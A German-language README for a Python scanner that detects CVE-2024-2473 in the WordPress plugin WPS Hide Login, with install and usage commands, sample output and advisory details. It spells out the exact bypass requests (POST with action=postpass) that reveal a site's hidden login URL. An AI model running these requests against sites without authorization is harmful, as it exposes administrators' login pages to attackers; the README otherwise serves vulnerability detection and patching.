
Offenlegung der versteckten WordPress-Anmeldeseite. Erkennt die Offenlegung der Anmeldeseite auf WordPress-Websites, die WPS Hide Login ≤ 1.9.15.2 ausführen (CVE-2024-2473).
Ein professioneller Python-Scanner zur Erkennung der Offenlegung der Login-Seite bei WordPress-Websites, die WPS Hide Login ≤ 1.9.15.2 verwenden
Programmiert von Venexy
WPS Hide Login ist ein beliebtes WordPress-Plugin, das Administratoren ermöglicht, die Standard-URL /wp-login.php in einen eigenen, versteckten Pfad zu ändern – was einer Sicherheit durch Obskurität entspricht.
Dieser Scanner erkennt CVE-2024-2473, eine Schwachstelle, bei der der Parameter action=postpass angegeben werden kann, um den Schutzmechanismus des Plugins vollständig zu umgehen und die URL der versteckten Login-Seite für nicht authentifizierte Angreifer offenzulegen.
Das Plugin WPS Hide Login verlagert die WordPress-Login-Seite von der Standard-URL /wp-login.php auf eine vom Administrator gewählte, benutzerdefinierte URL. In allen Versionen bis einschließlich 1.9.15.2 umgeht jedoch die Angabe des Query-Parameters action=postpass an /wp-login.php oder /wp-admin/ diesen Schutz und gibt die tatsächliche Action-URL des versteckten Login-Formulars preis – der geheime Login-Pfad wird dadurch für jeden nicht authentifizierten Angreifer sichtbar.
Der Scanner bildet den Angriffsablauf der Schwachstelle in drei Phasen nach:
Phase 1 ─► Confirm target is a WordPress installation
│
▼
Phase 2a ─► POST /wp-login.php?action=postpass
with body: action=lostpassword&post_password=test
Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
Extract hidden login URL from form action attribute
│
Phase 2b ─► POST /wp-admin/?action=postpass
Check: HTTP 302 redirect to location containing reauth=1 or /login
│
▼
Report hidden login URL if discovered
Wenn entweder Phase 2a oder Phase 2b zutrifft, wird das Ziel als verwundbar markiert.
requests-Bibliothek1. Repository klonen
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. Abhängigkeiten installieren
pip install requests
Hinweis: Auf Systemen mit Python-Virtualenvs oder Kali Linux kann Folgendes erforderlich sein:
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| Argument | Beschreibung | Standard |
|---|---|---|
-u, --url |
# Basic scan
python CVE-2024-2473.py -u https://example.com
# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15
# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Holen Sie vor der Durchführung einer Sicherheitsbewertung stets die ausdrückliche schriftliche Genehmigung des Eigentümers des Zielsystems ein. Nicht autorisiertes Scannen oder Ausnutzen von Systemen ist illegal und unethisch.
Nutzen Sie es verantwortungsbewusst.
Mit ❤️ programmiert von Venexy
Wenn dir dieses Tool geholfen hat, erwäge, dem Repository einen ⭐🌟🌟🌟 zu geben
| Feld | Details |
|---|
| CVE ID | CVE-2024-2473 |
| Betroffen | WPS Hide Login Plugin ≤ 1.9.15.2 für WordPress |
| Schweregrad | Mittel |
| CVSS-Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — Offenlegung sensibler Informationen |
| EPSS-Score | 0.10433 (93. Perzentil) |
| Authentifizierung erforderlich | Keine |
| Anbieter | WPServeur |
| Abhilfe | Plugin auf Version > 1.9.15.2 aktualisieren |
| Basis-URL der Ziel-WordPress-Website (erforderlich) |
| — |
-t, --timeout | HTTP-Request-Timeout in Sekunden | 10 |
| Ressource | Link |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Wordfence-Sicherheitshinweis | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| WPS Hide Login Plugin | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| CVSS-3.1-Rechner | https://www.first.org/cvss/calculator/3.1 |